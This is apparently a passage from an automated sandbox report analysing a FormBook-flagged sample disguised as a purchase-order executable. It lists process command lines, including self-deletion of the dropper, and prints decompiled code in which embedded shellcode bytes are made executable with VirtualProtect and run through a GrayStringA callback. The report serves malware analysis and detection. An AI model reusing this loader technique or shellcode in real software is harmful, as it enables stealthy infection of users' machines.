                          Commandline:C:\Windows\SysWOW64\cscript.exe
                          Imagebase:0x1210000
                          File size:143360 bytes
                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          General

                          Start time:08:35:49
                          Start date:15/09/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del 'C:\Users\user\Desktop\PO 56720012359.exe'
                          Imagebase:0x150000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:08:35:49
                          Start date:15/09/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Code Analysis


                            Executed Functions

                            C-Code - Quality: 100%
                            			E008B1670(intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				char _v20;
                            				char _v21;
                            				char _v22;
                            				char _v23;
                            				char _v24;
                            				signed int _v28;
                            				char _v31;
                            				char _v32;
                            				char _v33;
                            				char _v34;
                            				char _v35;
                            				char _v36;
                            				char _v37;
                            				char _v38;
                            				char _v39;
                            				char _v40;
                            				char _v41;
                            				char _v42;
                            				char _v43;
                            				char _v44;
                            				char _v45;
                            				char _v46;
                            				char _v47;
                            				char _v48;
                            				char _v49;
                            				char _v50;
                            				char _v51;
                            				char _v52;
                            				char _v53;
                            				char _v54;
                            				char _v55;
                            				char _v56;
                            				char _v57;
                            				char _v58;
                            				char _v59;
                            				char _v60;
                            				char _v61;
                            				char _v62;
                            				char _v63;
                            				char _v64;
                            				char _v65;
                            				char _v66;
                            				char _v67;
                            				char _v68;
                            				char _v69;
                            				char _v70;
                            				char _v71;
                            				char _v72;
                            				char _v73;
                            				char _v74;
                            				char _v75;
                            				char _v76;
                            				char _v77;
                            				char _v78;
                            				char _v79;
                            				char _v80;
                            				char _v81;
                            				char _v82;
                            				char _v83;
                            				char _v84;
                            				char _v85;
                            				char _v86;
                            				char _v87;
                            				char _v88;
                            				char _v89;
                            				char _v90;
                            				char _v91;
                            				char _v92;
                            				char _v93;
                            				char _v94;
                            				char _v95;
                            				char _v96;
                            				char _v97;
                            				char _v98;
                            				char _v99;
                            				char _v100;
                            				char _v101;
                            				char _v102;
                            				char _v103;
                            				char _v104;
                            				char _v105;
                            				char _v106;
                            				char _v107;
                            				char _v108;
                            				char _v109;
                            				char _v110;
                            				char _v111;
                            				char _v112;
                            				char _v113;
                            				char _v114;
                            				char _v115;
                            				char _v116;
                            				char _v117;
                            				char _v118;
                            				char _v119;
                            				char _v120;
                            				char _v121;
                            				char _v122;
                            				char _v123;
                            				char _v124;
                            				char _v125;
                            				char _v126;
                            				char _v127;
                            				char _v128;
                            				char _v129;
                            				char _v130;
                            				char _v131;
                            				char _v132;
                            				char _v133;
                            				char _v134;
                            				char _v135;
                            				char _v136;
                            				char _v137;
                            				char _v138;
                            				_Unknown_base(*)() _v624;
                            				struct HWND__* _v628;
                            				struct HWND__** _v632;
                            				char _v636;
                            				struct HWND__* _v640;
                            				long _v644;
                            				void* _v1644;
                            				void* _t768;
                            
                            				_v311 = 0xf8;
                            				_v310 = 0xe8;
                            				_v309 = 0xf0;
                            				_v308 = 0xfe;
                            				_v307 = 0xff;
                            				_v306 = 0xff;
                            				_v305 = 0x83;
                            				_v304 = 0xc4;
                            				_v303 = 0x18;
                            				_v302 = 0x8b;
                            				_v301 = 0xf0;
                            				_v300 = 0x6a;
                            				_v299 = 4;
                            				_v298 = 0x68;
                            				_v297 = 0;
                            				_v296 = 0x30;
                            				_v295 = 0;
                            				_v294 = 0;
                            				_v293 = 0x68;
                            				_v292 = 0xb8;
                            				_v291 = 0x64;
                            				_v290 = 3;
                            				_v289 = 0;
                            				_v288 = 0x6a;
                            				_v287 = 0;
                            				_v286 = 0xff;
                            				_v285 = 0xd3;
                            				_v284 = 0x89;
                            				_v283 = 0x45;
                            				_v282 = 0xfc;
                            				_v281 = 0x8d;
                            				_v280 = 0x45;
                            				_v279 = 0xf4;
                            				_v278 = 0x50;
                            				_v277 = 0x8d;
                            				_v276 = 0x45;
                            				_v275 = 0xec;
                            				_v274 = 0x50;
                            				_v273 = 0x6a;
                            				_v272 = 0;
                            				_v271 = 0xff;
                            				_v270 = 0xd7;
                            				_v269 = 0x50;
                            				_v268 = 0x33;
                            				_v267 = 0xff;
                            				_v266 = 0x57;
                            				_v265 = 0xff;
                            				_v264 = 0xd6;
                            				_v263 = 0x68;
                            				_v262 = 0xb8;
                            				_v261 = 0x64;
                            				_v260 = 3;
                            				_v259 = 0;
                            				_v258 = 0x50;
                            				_v257 = 0xff;
                            				_v256 = 0x75;
                            				_v255 = 0xfc;
                            				_v254 = 0xe8;
                            				_v253 = 0xb6;
                            				_v252 = 0;
                            				_v251 = 0;
                            				_v250 = 0;
                            				_v249 = 0x83;
                            				_v248 = 0xc4;
                            				_v247 = 0xc;
                            				_v246 = 0x6a;
                            				_v245 = 0x40;
                            				_v244 = 0x68;
                            				_v243 = 0;
                            				_v242 = 0x30;
                            				_v241 = 0;
                            				_v240 = 0;
                            				_v239 = 0x68;
                            				_v238 = 0x9b;
                            				_v237 = 0x14;
                            				_v236 = 0;
                            				_v235 = 0;
                            				_v234 = 0x57;
                            				_v233 = 0xff;
                            				_v232 = 0xd3;
                            				_v231 = 0x6a;
                            				_v230 = 4;
                            				_v229 = 0x68;
                            				_v228 = 0;
                            				_v227 = 0x30;
                            				_v226 = 0;
                            				_v225 = 0;
                            				_v224 = 0x68;
                            				_v223 = 0x1d;
                            				_v222 = 0x50;
                            				_v221 = 3;
                            				_v220 = 0;
                            				_v219 = 0x57;
                            				_v218 = 0x8b;
                            				_v217 = 0xf0;
                            				_v216 = 0xff;
                            				_v215 = 0xd3;
                            				_v214 = 0x8b;
                            				_v213 = 0x5d;
                            				_v212 = 0xfc;
                            				_v211 = 0x8b;
                            				_v210 = 0xf8;
                            				_v209 = 0x68;
                            				_v208 = 0x9b;
                            				_v207 = 0x14;
                            				_v206 = 0;
                            				_v205 = 0;
                            				_v204 = 0x53;
                            				_v203 = 0x56;
                            				_v202 = 0xe8;
                            				_v201 = 0x82;
                            				_v200 = 0;
                            				_v199 = 0;
                            				_v198 = 0;
                            				_v197 = 0x83;
                            				_v196 = 0xc4;
                            				_v195 = 0xc;
                            				_v194 = 0x33;
                            				_v193 = 0xd2;
                            				_v192 = 0x8a;
                            				_v191 = 0xc;
                            				_v190 = 0x32;
                            				_v189 = 0xb0;
                            				_v188 = 0xd;
                            				_v187 = 0x80;
                            				_v186 = 0xe9;
                            				_v185 = 0x22;
                            				_v184 = 0x80;
                            				_v183 = 0xf1;
                            				_v182 = 0x6a;
                            				_v181 = 0x2a;
                            				_v180 = 0xca;
                            				_v179 = 0x80;
                            				_v178 = 0xe9;
                            				_v177 = 0x7f;
                            				_v176 = 0xc0;
                            				_v175 = 0xc1;
                            				_v174 = 2;
                            				_v173 = 0x2a;
                            				_v172 = 0xca;
                            				_v171 = 0x80;
                            				_v170 = 0xf1;
                            				_v169 = 0xcd;
                            				_v168 = 2;
                            				_v167 = 0xca;
                            				_v166 = 0xd0;
                            				_v165 = 0xc1;
                            				_v164 = 0x80;
                            				_v163 = 0xf1;
                            				_v162 = 0x22;
                            				_v161 = 0x80;
                            				_v160 = 0xe9;
                            				_v159 = 7;
                            				_v158 = 0x32;
                            				_v157 = 0xca;
                            				_v156 = 2;
                            				_v155 = 0xca;
                            				_v154 = 0xf6;
                            				_v153 = 0xd9;
                            				_v152 = 0x32;
                            				_v151 = 0xca;
                            				_v150 = 0x80;
                            				_v149 = 0xf1;
                            				_v148 = 0x49;
                            				_v147 = 0x2a;
                            				_v146 = 0xca;
                            				_v145 = 0x32;
                            				_v144 = 0xca;
                            				_v143 = 0xc0;
                            				_v142 = 0xc1;
                            				_v141 = 3;
                            				_v140 = 0x2a;
                            				_v139 = 0xc1;
                            				_v138 = 0x32;
                            				_v137 = 0xc2;
                            				_v136 = 4;
                            				_v135 = 0x4b;
                            				_v134 = 0xc0;
                            				_v133 = 0xc8;
                            				_v132 = 2;
                            				_v131 = 0x2a;
                            				_v130 = 0xc2;
                            				_v129 = 0xc0;
                            				_v128 = 0xc0;
                            				_v127 = 2;
                            				_v126 = 2;
                            				_v125 = 0xc2;
                            				_v124 = 0x32;
                            				_v123 = 0xc2;
                            				_v122 = 2;
                            				_v121 = 0xc2;
                            				_v120 = 0x32;
                            				_v119 = 0xc2;
                            				_v118 = 4;
                            				_v117 = 0x61;
                            				_v116 = 0xf6;
                            				_v115 = 0xd0;
                            				_v114 = 2;
                            				_v113 = 0xc2;
                            				_v112 = 0x32;
                            				_v111 = 0xc2;
                            				_v110 = 0x88;
                            				_v109 = 4;
                            				_v108 = 0x32;
                            				_v107 = 0x42;
                            				_v106 = 0x81;
                            				_v105 = 0xfa;
                            				_v104 = 0x9b;
                            				_v103 = 0x14;
                            				_v102 = 0;
                            				_v101 = 0;
                            				_v100 = 0x72;
                            				_v99 = 0xa2;
                            				_v98 = 0x68;
                            				_v97 = 0x1d;
                            				_v96 = 0x50;
                            				_v95 = 3;
                            				_v94 = 0;
                            				_v93 = 0x8d;
                            				_v92 = 0x83;
                            				_v91 = 0x9b;
                            				_v90 = 0x14;
                            				_v89 = 0;
                            				_v88 = 0;
                            				_v87 = 0x50;
                            				_v86 = 0x57;
                            				_v85 = 0xe8;
                            				_v84 = 0xd;
                            				_v83 = 0;
                            				_v82 = 0;
                            				_v81 = 0;
                            				_v80 = 0x57;
                            				_v79 = 0xff;
                            				_v78 = 0xd6;
                            				_v77 = 0x83;
                            				_v76 = 0xc4;
                            				_v75 = 0x10;
                            				_v74 = 0x5f;
                            				_v73 = 0x5e;
                            				_v72 = 0x5b;
                            				_v71 = 0x8b;
                            				_v70 = 0xe5;
                            				_v69 = 0x5d;
                            				_v68 = 0xc3;
                            				_v67 = 0x55;
                            				_v66 = 0x8b;
                            				_v65 = 0xec;
                            				_v64 = 0x8b;
                            				_v63 = 0x55;
                            				_v62 = 0x10;
                            				_v61 = 0x85;
                            				_v60 = 0xd2;
                            				_v59 = 0x74;
                            				_v58 = 0x15;
                            				_v57 = 0x8b;
                            				_v56 = 0x4d;
                            				_v55 = 8;
                            				_v54 = 0x56;
                            				_v53 = 0x8b;
                            				_v52 = 0x75;
                            				_v51 = 0xc;
                            				_v50 = 0x2b;
                            				_v49 = 0xf1;
                            				_v48 = 0x8a;
                            				_v47 = 4;
                            				_v46 = 0xe;
                            				_v45 = 0x88;
                            				_v44 = 1;
                            				_v43 = 0x41;
                            				_v42 = 0x83;
                            				_v41 = 0xea;
                            				_v40 = 1;
                            				_v39 = 0x75;
                            				_v38 = 0xf5;
                            				_v37 = 0x5e;
                            				_v36 = 0x5d;
                            				_v35 = 0xc3;
                            				_v34 = 0;
                            				_v33 = 0;
                            				_v32 = 0;
                            				_v31 = 0;
                            				_v636 = 0xa;
                            				_v632 =  &_v636;
                            				_v24 = 0x3b;
                            				_v23 = 0x2d;
                            				_v22 = 0x19;
                            				_v21 = 0x72;
                            				_v20 = 0x73;
                            				_v628 = 0;
                            				_v640 = 0;
                            				while(1) {
                            					 *(_t768 + 0xfffffffffffffff4) = 0xf;
                            					 *(_t768 + 0xbadba1) = 0x1f;
                            					 *(_t768 + 0xbadba1) = 0x2d;
                            					 *(_t768 + 0xfffffffffffffff7) = 0x46;
                            					 *(_t768 + 0xbadba1) = 0x41;
                            					_v632 =  &_v628;
                            					_v28 = 0;
                            					while(_v28 < 5) {
                            						 *(_t768 + _v28 - 0xc) =  *(_t768 + _v28 - 0xc) & 0x000000ff ^  *(_v632 + _v28 % 3);
                            						_v28 = _v28 + 1;
                            					}
                            					if(( *(_t768 + 0xffffffffffffffec) & 0x000000ff) == ( *(_t768 + 0xfffffffffffffff4) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff) || ( *(_t768 + 0xffffffffffffffef) & 0x000000ff) == ( *(_t768 + 0xfffffffffffffff7) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff)) {
                            						VirtualProtect( &_v624, 0x252, 0x40,  &_v644); // executed
                            						GrayStringA(GetDC(0), 0,  &_v624,  &_v1644, 0, 0, 0, 0, 0); // executed
                            						MessageBoxW(0, 0, 0, 0);
                            						_v8 = 1;
                            						while(_v8 < _a4) {
                            							if(lstrcmpiW( *(_a8 + _v8 * 4), L"/k") == 0 || lstrcmpiW( *(_a8 + _v8 * 4), L"-k") == 0) {
                            								_v8 = _v8 + 1;
                            								if(_v8 < _a4) {
                            									if(E008B15A0( *(_a8 + _v8 * 4)) != 0) {
                            										_v8 = _v8 + 1;
                            										continue;
                            									}
                            									return 0;
                            								}
                            								return 0;
                            							} else {
                            								return 0;
                            							}
                            						}
                            						return 0;
                            					} else {
                            						_v628 =  &(_v628->i);
                            						continue;
                            					}
                            				}
                            			}
                            0x008b2185
                            0x008b218c
                            0x008b2193
                            0x008b219a
                            0x008b21a1
                            0x008b21a8
                            0x008b21af
                            0x008b21b6
                            0x008b21bd
                            0x008b21c4
                            0x008b21cb
                            0x008b21d2
                            0x008b21d9
                            0x008b21e0
                            0x008b21e7
                            0x008b21ee
                            0x008b21f5
                            0x008b21fc
                            0x008b2203
                            0x008b220a
                            0x008b2211
                            0x008b2218
                            0x008b221f
                            0x008b2226
                            0x008b222d
                            0x008b2234
                            0x008b223b
                            0x008b2242
                            0x008b2249
                            0x008b2250
                            0x008b2257
                            0x008b225e
                            0x008b2265
                            0x008b226c
                            0x008b2273
                            0x008b227a
                            0x008b2281
                            0x008b2288
                            0x008b228f
                            0x008b2296
                            0x008b229d
                            0x008b22a4
                            0x008b22ab
                            0x008b22b2
                            0x008b22b9
                            0x008b22c0
                            0x008b22c7
                            0x008b22ce
                            0x008b22d5
                            0x008b22dc
                            0x008b22e3
                            0x008b22ea
                            0x008b22f1
                            0x008b22f8
                            0x008b22ff
                            0x008b2306
                            0x008b230d
                            0x008b2314
                            0x008b231b
                            0x008b2322
                            0x008b2329
                            0x008b2330
                            0x008b2337
                            0x008b233e
                            0x008b2345
                            0x008b234c
                            0x008b2353
                            0x008b235a
                            0x008b2361
                            0x008b2368
                            0x008b236f
                            0x008b2376
                            0x008b237d
                            0x008b2384
                            0x008b238b
                            0x008b2392
                            0x008b2399
                            0x008b23a0
                            0x008b23a7
                            0x008b23ae
                            0x008b23b5
                            0x008b23bc
                            0x008b23c3
                            0x008b23ca
                            0x008b23d1
                            0x008b23d8
                            0x008b23df
                            0x008b23e6
                            0x008b23ed
                            0x008b23f1
                            0x008b23f5
                            0x008b23f9
                            0x008b23fd
                            0x008b2401
                            0x008b2405
                            0x008b2409
                            0x008b240d
                            0x008b2411
                            0x008b2415
                            0x008b2419
                            0x008b241d
                            0x008b2421
                            0x008b2425
                            0x008b2429
                            0x008b242d
                            0x008b2431
                            0x008b2435
                            0x008b2439
                            0x008b243d
                            0x008b2441
                            0x008b2445
                            0x008b2449
                            0x008b244d
                            0x008b2451
                            0x008b2455
                            0x008b2459
                            0x008b245d
                            0x008b2461
                            0x008b2465
                            0x008b2469
                            0x008b246d
                            0x008b2471
                            0x008b2475
                            0x008b2479
                            0x008b247d
                            0x008b2481
                            0x008b2485
                            0x008b2489
                            0x008b248d
                            0x008b2491
                            0x008b2495
                            0x008b2499
                            0x008b249d
                            0x008b24a1
                            0x008b24a5
                            0x008b24a9
                            0x008b24ad
                            0x008b24b1
                            0x008b24b5
                            0x008b24b9
                            0x008b24bd
                            0x008b24c1
                            0x008b24c5
                            0x008b24c9
                            0x008b24cd
                            0x008b24d1
                            0x008b24d5
                            0x008b24d9
                            0x008b24dd
                            0x008b24e1
                            0x008b24e5
                            0x008b24e9
                            0x008b24ed
                            0x008b24f1
                            0x008b24f5
                            0x008b24f9
                            0x008b24fd
                            0x008b2501
                            0x008b2505
                            0x008b2509
                            0x008b250d
                            0x008b2511
                            0x008b2515
                            0x008b2519
                            0x008b251d
                            0x008b2521
                            0x008b2525
                            0x008b2529
                            0x008b252d
                            0x008b2531
                            0x008b2535
                            0x008b2539
                            0x008b253d
                            0x008b2541
                            0x008b2545
                            0x008b2549
                            0x008b254d
                            0x008b2551
                            0x008b2555
                            0x008b2559
                            0x008b255d
                            0x008b2561
                            0x008b2565
                            0x008b2569
                            0x008b256d
                            0x008b2571
                            0x008b2575
                            0x008b2579
                            0x008b257d
                            0x008b2581
                            0x008b2585
                            0x008b2595
                            0x008b259b
                            0x008b259f
                            0x008b25a3
                            0x008b25a7
                            0x008b25ab
                            0x008b25af
                            0x008b25b9
                            0x008b25c3
                            0x008b25cb
                            0x008b25d8
                            0x008b25e4
                            0x008b25f1
                            0x008b25fe
                            0x008b2609
                            0x008b260f
                            0x008b2621
                            0x008b264a
                            0x008b261e
                            0x008b261e
                            0x008b266c
                            0x008b270f
                            0x008b2738
                            0x008b2746
                            0x008b274c
                            0x008b275e
                            0x008b277d
                            0x008b279e
                            0x008b27a7
                            0x008b27be
                            0x008b275b
                            0x00000000
                            0x008b275b
                            0x00000000
                            0x008b27c0
                            0x00000000
                            0x008b27c6
                            0x00000000
                            0x008b27c6
                            0x008b277d
                            0x00000000
                            0x008b26e6
                            0x008b26ef
                            0x00000000
                            0x008b26ef
                            0x008b266c

                            APIs
                            • VirtualProtect.KERNELBASE(000000E9,00000252,00000040,?), ref: 008B270F
                            • GetDC.USER32(00000000), ref: 008B2731
                            • GrayStringA.USER32(00000000), ref: 008B2738
                            • MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 008B2746
                            • lstrcmpiW.KERNEL32(?,008C2198), ref: 008B2775
                            • lstrcmpiW.KERNEL32(?,008C21A0), ref: 008B278E
                              • Part of subcall function 008B15A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 008B15C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrcmpi$GrayMessageOpenProtectStringVirtual
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E008B6347(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
                            				void* __esi;
                            				void* _t2;
                            				void* _t6;
                            				void* _t7;
                            				void* _t11;
                            				long _t18;
                            				void* _t22;
                            				long _t25;
                            
                            				_t23 = __edi;
                            				_t22 = __edx;
                            				_t14 = __ebx;
                            				_t25 = _a4;
                            				if(_t25 > 0xffffffe0) {
                            					E008B5360(_t2, _t25);
                            					 *((intOrPtr*)(E008B5065(__eflags))) = 0xc;
                            					__eflags = 0;
                            					return 0;
                            				}
                            				_push(__ebx);
                            				_push(__edi);
                            				while(1) {
                            					_t6 =  *0x8c329c; // 0x10e0000
                            					_t27 = _t6;
                            					if(_t6 == 0) {
                            						E008B379A(_t14, _t22, _t23, _t25, _t27);
                            						E008B37F7(_t14, _t22, _t23, _t25, 0x1e);
                            						E008B2EE5(0xff);
                            						_t6 =  *0x8c329c; // 0x10e0000
                            					}
                            					if(_t25 == 0) {
                            						_t18 = 1;
                            						__eflags = 1;
                            					} else {
                            						_t18 = _t25;
                            					}
                            					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
                            					_t23 = _t7;
                            					if(_t23 != 0) {
                            						break;
                            					}
                            					_t14 = 0xc;
                            					if( *0x8c40d0 == _t7) {
                            						 *((intOrPtr*)(E008B5065(__eflags))) = _t14;
                            						L12:
                            						 *((intOrPtr*)(E008B5065(_t31))) = _t14;
                            						break;
                            					}
                            					_t11 = E008B5360(_t7, _t25);
                            					_t31 = _t11;
                            					if(_t11 != 0) {
                            						continue;
                            					}
                            					goto L12;
                            				}
                            				return _t23;
                            			}












                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 008B635E
                              • Part of subcall function 008B379A: __NMSG_WRITE.LIBCMT ref: 008B37C1
                              • Part of subcall function 008B379A: __NMSG_WRITE.LIBCMT ref: 008B37CB
                            • __NMSG_WRITE.LIBCMT ref: 008B6365
                              • Part of subcall function 008B37F7: GetModuleFileNameW.KERNEL32(00000000,008C35EA,00000104,00000000,00000000,00000000), ref: 008B3889
                              • Part of subcall function 008B37F7: ___crtMessageBoxW.LIBCMT ref: 008B3937
                              • Part of subcall function 008B2EE5: ExitProcess.KERNEL32 ref: 008B2EF4
                              • Part of subcall function 008B5065: __getptd_noexit.LIBCMT ref: 008B5065
                            • RtlAllocateHeap.NTDLL(010E0000,00000000,00000001,00000000,00000000,00000000,?,008B434C,00000000,00000000,00000000,00000000,?,008B4201,00000018,008C11B8), ref: 008B638A
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 80%
                            			E008B1450(WCHAR* _a4) {
                            				WCHAR* _v8;
                            				signed int _v12;
                            				void* _v16;
                            				int _v20;
                            				long _t65;
                            
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = _a4;
                            				while(( *_v8 & 0x0000ffff) != 0) {
                            					_v12 = _v12 + 1;
                            					_v8 =  &(_v8[lstrlenW(_v8)]);
                            					_v8 =  &(_v8[1]);
                            				}
                            				_v16 = HeapAlloc(GetProcessHeap(), 0, 8 + _v12 * 8);
                            				_v12 = 0;
                            				_v8 = _a4;
                            				while(( *_v8 & 0x0000ffff) != 0) {
                            					if(E008B1160(_v8, _v16 + _v12 * 8) != 0) {
                            						_v12 = _v12 + 1;
                            						_v8 =  &(_v8[lstrlenW(_v8)]);
                            						_v8 =  &(_v8[1]);
                            						continue;
                            					}
                            					HeapFree(GetProcessHeap(), 0, _v16);
                            					return 0;
                            				}
                            				 *(_v16 + _v12 * 8) = 0;
                            				 *(_v16 + 4 + _v12 * 8) = 0;
                            				_v20 = StartServiceCtrlDispatcherW(_v16);
                            				if(_v20 == 0) {
                            					_t65 = GetLastError();
                            					0x8b0000(_a4, _t65);
                            					0x8b0000("StartServiceCtrlDispatcherW failed to start %s: %u\n", _t65);
                            				}
                            				HeapFree(GetProcessHeap(), 0, _v16);
                            				return _v20;
                            			}









                            APIs
                            • lstrlenW.KERNEL32(00000000), ref: 008B1488
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14AF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B14B6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14F3
                            • HeapFree.KERNEL32(00000000), ref: 008B14FA
                            • lstrlenW.KERNEL32(00000000), ref: 008B1514
                            • StartServiceCtrlDispatcherW.ADVAPI32(00000000), ref: 008B154D
                            • GetLastError.KERNEL32 ref: 008B155C
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B157D
                            • HeapFree.KERNEL32(00000000), ref: 008B1584
                            Strings
                            • StartServiceCtrlDispatcherW failed to start %s: %u, xrefs: 008B156D
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Process$Freelstrlen$AllocCtrlDispatcherErrorLastServiceStart
                            • String ID: StartServiceCtrlDispatcherW failed to start %s: %u
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E008B10B0(WCHAR* _a4) {
                            				long _v8;
                            				void* _v12;
                            				long _t25;
                            				long _t30;
                            
                            				_v8 = 0;
                            				_v8 = ExpandEnvironmentStringsW(_a4, 0, _v8);
                            				if(_v8 != 0) {
                            					_t19 = _v8;
                            					_t9 = _t19 + 2; // 0x2
                            					_v12 = HeapAlloc(GetProcessHeap(), 0, _v8 + _t9);
                            					if(ExpandEnvironmentStringsW(_a4, _v12, _v8) != 0) {
                            						return _v12;
                            					}
                            					_t25 = GetLastError();
                            					0x8b0000(_a4, _t25);
                            					0x8b0000("cannot expand env vars in %s: %u\n", _t25);
                            					HeapFree(GetProcessHeap(), 0, _v12);
                            					return 0;
                            				}
                            				_t30 = GetLastError();
                            				0x8b0000(_a4, _t30);
                            				0x8b0000("cannot expand env vars in %s: %u\n", _t30);
                            				return 0;
                            			}








                            APIs
                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 008B10C7
                            • GetLastError.KERNEL32 ref: 008B10D6
                            • GetProcessHeap.KERNEL32(00000000,00000002), ref: 008B10FF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1106
                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000000), ref: 008B111B
                            • GetLastError.KERNEL32 ref: 008B1125
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1146
                            • HeapFree.KERNEL32(00000000), ref: 008B114D
                            Strings
                            • cannot expand env vars in %s: %u, xrefs: 008B1136
                            • cannot expand env vars in %s: %u, xrefs: 008B10E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$EnvironmentErrorExpandLastProcessStrings$AllocFree
                            • String ID: cannot expand env vars in %s: %u$cannot expand env vars in %s: %u
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B4121(struct _EXCEPTION_POINTERS* _a4) {
                            
                            				SetUnhandledExceptionFilter(0);
                            				return UnhandledExceptionFilter(_a4);
                            			}

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008B4F97,?,?,?,00000000), ref: 008B4126
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 008B412F
                            Memory Dump Source
